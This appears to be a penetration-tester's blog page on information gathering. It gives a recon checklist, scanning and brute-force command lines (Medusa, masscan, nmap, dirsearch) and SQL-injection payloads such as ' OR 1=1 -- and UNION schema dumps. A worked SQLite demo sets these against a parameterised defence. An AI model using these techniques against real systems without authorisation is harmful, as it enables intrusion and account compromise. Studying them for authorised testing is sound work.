Hacking for fun
Information Gathering

Preface

Information gathering is the preparatory phase of a penetration test. Its purpose is to enlarge the target's attack surface and lay the groundwork for the targeted testing that follows. In my view, information gathering = process + tools: with a complete process and tools that fit the hand, information gathering can be automated (done without thinking), so I have put together a methodology for readers' reference.

The notes below are taken from my own notebook and are in English because, in real work, we must always protect ourselves and minimise our fingerprint (the notes below still carry obvious Chinese traits, which is a bad example). Examples: work devices must not be exposed to malicious physical contact (e.g. USB sticks); the operating system's time zone and language; where sensitive files are stored; one dedicated VM for each task; the network environment; and so on. These are unrelated to this blog, so I will not expand on them here.

Process

Prerequisite: assume a target domain name is already known.

  • whois
  • fuzz the brand name across other top-level domains
    • host="xxx" in fofa
    • check which of those domains are already registered (GoDaddy)
  • use tools to search for the specific target
    • fofa clue search
    • whois (whoxy, sqlsec.com)
      • similar domains
      • whois history
    • github.com: in:xxx
    • virustotal
    • CMS fingerprint
    • censys
    • netlas.io
    • beian.miit.gov.cn (ICP filing lookup)
    • error pages / logs
  • find the real IP (behind the CDN)
    • favicon hash
    • DNS records
    • SSL certificate
    • ping from many places
    • search for a specific response body
    • Ctrl+U (view source) → related code → directory traversal (try changing IP when access is denied)
    • nslookup
  • scan the adjacent network range (e.g. 1.1.1.1 - 1.1.1.10)
    • don't skip hosts that don't load normally (status codes 3xx ~ 4xx)
  • find all subdomains
  • scan ports && directories (an unusual port or directory may map to a specific exploit)
    • deduplicate
    • attack according to service type
    • look for dynamic files & admin interfaces rather than static files (check the source code)
      • audit the code and search for "admin, login, ajax"
      • Chrome developer tools
  • discover vulnerabilities & exploits
    • login interface without verification (no CAPTCHA, no lockout): try brute force
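The "favicon hash" step above is worth making concrete. Shodan (`http.favicon.hash`) and fofa (`icon_hash`) index MurmurHash3 of the base64 text of the icon (76-column lines with a trailing newline, as `codecs.encode(data, "base64")` produces), so an origin server hiding behind a CDN can often be found by hashing the favicon served through the CDN and searching for that hash. The script below is an added example written for this page, not code from the original notes: it implements MurmurHash3 x86_32 in pure Python (no mmh3 dependency), applies the engines' base64 convention, and prints the queries to paste into each engine. The file path in the usage line is a placeholder.

```python
import base64
import sys


def murmur3_32(data: bytes, seed: int = 0) -> int:
    """MurmurHash3 x86_32 (the function behind mmh3.hash), returned as a
    signed 32-bit integer, which is how Shodan and fofa display it."""
    c1, c2, mask = 0xCC9E2D51, 0x1B873593, 0xFFFFFFFF

    def rotl(x: int, r: int) -> int:
        return ((x << r) | (x >> (32 - r))) & mask

    h1 = seed & mask
    nblocks = len(data) // 4
    for i in range(nblocks):                      # full 4-byte little-endian blocks
        k1 = int.from_bytes(data[4 * i:4 * i + 4], "little")
        k1 = rotl((k1 * c1) & mask, 15)
        k1 = (k1 * c2) & mask
        h1 = rotl(h1 ^ k1, 13)
        h1 = (h1 * 5 + 0xE6546B64) & mask

    tail = data[4 * nblocks:]                     # 0-3 leftover bytes
    k1 = 0
    if len(tail) >= 3:
        k1 ^= tail[2] << 16
    if len(tail) >= 2:
        k1 ^= tail[1] << 8
    if len(tail) >= 1:
        k1 ^= tail[0]
        k1 = rotl((k1 * c1) & mask, 15)
        k1 = (k1 * c2) & mask
        h1 ^= k1

    h1 ^= len(data)                               # fmix32 finalisation
    h1 ^= h1 >> 16
    h1 = (h1 * 0x85EBCA6B) & mask
    h1 ^= h1 >> 13
    h1 = (h1 * 0xC2B2AE35) & mask
    h1 ^= h1 >> 16
    return h1 - (1 << 32) if h1 & 0x80000000 else h1


def favicon_hash(icon: bytes) -> int:
    """Hash the icon the way the search engines do: over the base64 *text*
    (76-column lines, trailing newline) as produced by base64.encodebytes /
    codecs.encode(icon, "base64"), not over the raw icon bytes."""
    return murmur3_32(base64.encodebytes(icon))


def search_queries(h: int) -> dict:
    """Query strings for each engine; hits outside the CDN's address space
    are candidate origin servers."""
    return {
        "fofa": f'icon_hash="{h}"',
        "shodan": f"http.favicon.hash:{h}",
    }


if __name__ == "__main__":
    # Usage: python favicon_hash.py favicon.ico   (the path is a placeholder)
    with open(sys.argv[1], "rb") as f:
        h = favicon_hash(f.read())
    print(h)
    for engine, query in search_queries(h).items():
        print(f"{engine}: {query}")
```

Hashing the raw bytes instead of the wrapped base64 text gives a different number that matches nothing in either engine, which is the usual reason this technique "doesn't work" the first time.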

Tools

Register (temporary mail / password generators; links at the end of the page):

IP check:

  • virustotal
  • favicon hash, response body
  • DNS records
  • SSL certificate: search.censys.io
  • search engine: 0.zone

Password guessing:

  • online: Medusa, Hydra

    medusa -h <ip_address> -u admin -p admin -M <module> -n 10443

  • offline: Hashcat

    Hashcat cannot be used to recover online accounts (Gmail, Instagram, Facebook, Twitter, etc.): it only cracks hashes you already hold and has no way to work against a live login.

Port scan (scan the whole /24; every live host in the range counts as a result):

  • masscan, blackwater (use together and tune the parameters)

    blackwater -i x.x.x.x -c 400 -p 1-65535

    masscan -p1-65535 x.x.x.x/24 --exclude x.x.x.x-x.x.x.x --rate 800 > <result>

  • Nmap (service/version fingerprinting): nmap -A <ip_address> -oN <output_filename>

  • rustscan:

    alias rustscan='docker run -it --rm --name rustscan rustscan/rustscan:2.1.1'
    rustscan -a 127.0.0.1 -q --range 1-10000

Vulnerability scanning: Nessus, Core Impact, Netsparker

Framework: Metasploit

Directory (self-built websites && special paths):

  • dirmap:

    python3 dirmap.py -iF targets.txt -lcf
    python3 dirmap.py -i <url> -lcf

  • dirsearch:

    python dirsearch.py -e php -u <url> --exclude-status 403,401 --deep-recursive -o <output_filename>

  • dirb: dirb <url> -o <result>

Subdomain:

  • oneforall (directory, parameter): python3 oneforall.py --target <domain> --exclude www run --output <output_filename>
  • knockpy: knockpy -d <domain> --recon --bruteforce --save report
  • google: site:xxxxxx -www
  • fofa: domain="xxxxxx"

Search: fofa syntax

Traffic interception: Burp Suite

Images: exiftool (metadata)

Version recognition: hash values of known static files && wildcard (*) matching

SQL injection:

  • manually
    • determine whether there is an injection point and whether it is character or numeric (difference: whether quotation marks are needed && how many SQL statements are involved)
      • trick: 1' or 1=1 #, 1 or 1=1 # → does the response change?
      • sleep (time-based)
      • guess the number of fields in the SQL query
      • determine which fields are displayed
    • get the target
      • current database
      • tables
      • field names in the table
  • sqlmap
  • defence
    • PDO / prepared statements: user input is bound to the statement as a parameter, separated from the SQL text
    • make sure only one result is returned
    • anti-CSRF token
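The manual steps above (find the injection point, count the fields with ORDER BY, then pull the schema through a UNION) and the defence of binding input to the statement can be run end to end against a throwaway SQLite database. The following is an added example written for this page, not the author's code: the `users` table and its rows are constructed test data, the comment marker is `-- ` because SQLite has no `#` comment, and on MySQL `information_schema` would take the place of `sqlite_master`; the technique is otherwise the same.

```python
import sqlite3


def make_db() -> sqlite3.Connection:
    """Constructed stand-in for the target's backend (not real data)."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(
        """
        CREATE TABLE users (
            id       INTEGER PRIMARY KEY,
            username TEXT NOT NULL,
            password TEXT NOT NULL,
            role     TEXT NOT NULL
        );
        INSERT INTO users (username, password, role) VALUES
            ('admin', 'S3cret!', 'admin'),
            ('alice', 'alice123', 'user');
        """
    )
    return conn


def login_vulnerable(conn: sqlite3.Connection, username: str, password: str) -> list:
    """Character-type injection point: the input is spliced into the SQL text,
    so a quote in the input closes the string and the rest is parsed as SQL."""
    sql = (
        "SELECT id, username, role FROM users "
        f"WHERE username = '{username}' AND password = '{password}'"
    )
    return conn.execute(sql).fetchall()


def login_safe(conn: sqlite3.Connection, username: str, password: str) -> list:
    """Hardened form: bound parameters keep the input out of the SQL grammar,
    and the caller insists on exactly one matching row."""
    sql = "SELECT id, username, role FROM users WHERE username = ? AND password = ?"
    rows = conn.execute(sql, (username, password)).fetchall()
    return rows if len(rows) == 1 else []


def probe_column_count(conn: sqlite3.Connection, max_cols: int = 10):
    """'Guess the number of fields': ORDER BY n is accepted while n is at most
    the number of selected columns and errors as soon as it is larger."""
    for n in range(1, max_cols + 1):
        try:
            login_vulnerable(conn, f"' ORDER BY {n} -- ", "x")
        except sqlite3.OperationalError:
            return n - 1
    return None


def dump_schema_via_union(conn: sqlite3.Connection) -> list:
    """'Get the target': with the column count (3) known, a UNION SELECT pulls
    table names and DDL out of sqlite_master through the login query."""
    payload = "' UNION SELECT 1, name, sql FROM sqlite_master -- "
    return login_vulnerable(conn, payload, "x")


if __name__ == "__main__":
    db = make_db()
    print("bypass :", login_vulnerable(db, "' OR 1=1 -- ", "anything"))
    print("safe   :", login_safe(db, "' OR 1=1 -- ", "anything"))
    print("columns:", probe_column_count(db))
    print("schema :", dump_schema_via_union(db))
```

The `' OR 1=1 -- ` payload returns every user from `login_vulnerable` and nothing from `login_safe`; the second half of that defence, refusing anything but exactly one row, is what the "make sure only one result is returned" item above refers to.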


Last updated 11 months ago


Register:

  • https://strongpassword.onionmail.org
  • https://10minutemail.com

IP address / ASN:

  • https://ipinfo.io/AS3462

Ping from many places:

  • https://tools.ipip.net/newping.php

Bypass CDN (hosting history, passive DNS):

  • https://www.cnblogs.com/qiudabai/p/9763739.html
  • https://sitereport.netcraft.com/
  • https://dnslytics.com
  • https://passivedns.mnemonic.no

Subdomain:

  • https://api.subdomain.center/?domain=

HTTP probe:

  • https://github.com/projectdiscovery/httpx

Regular expressions:

  • https://ihateregex.io/expr/url/

Other:

  • https://pry.sh
  • https://scan.javasec.cn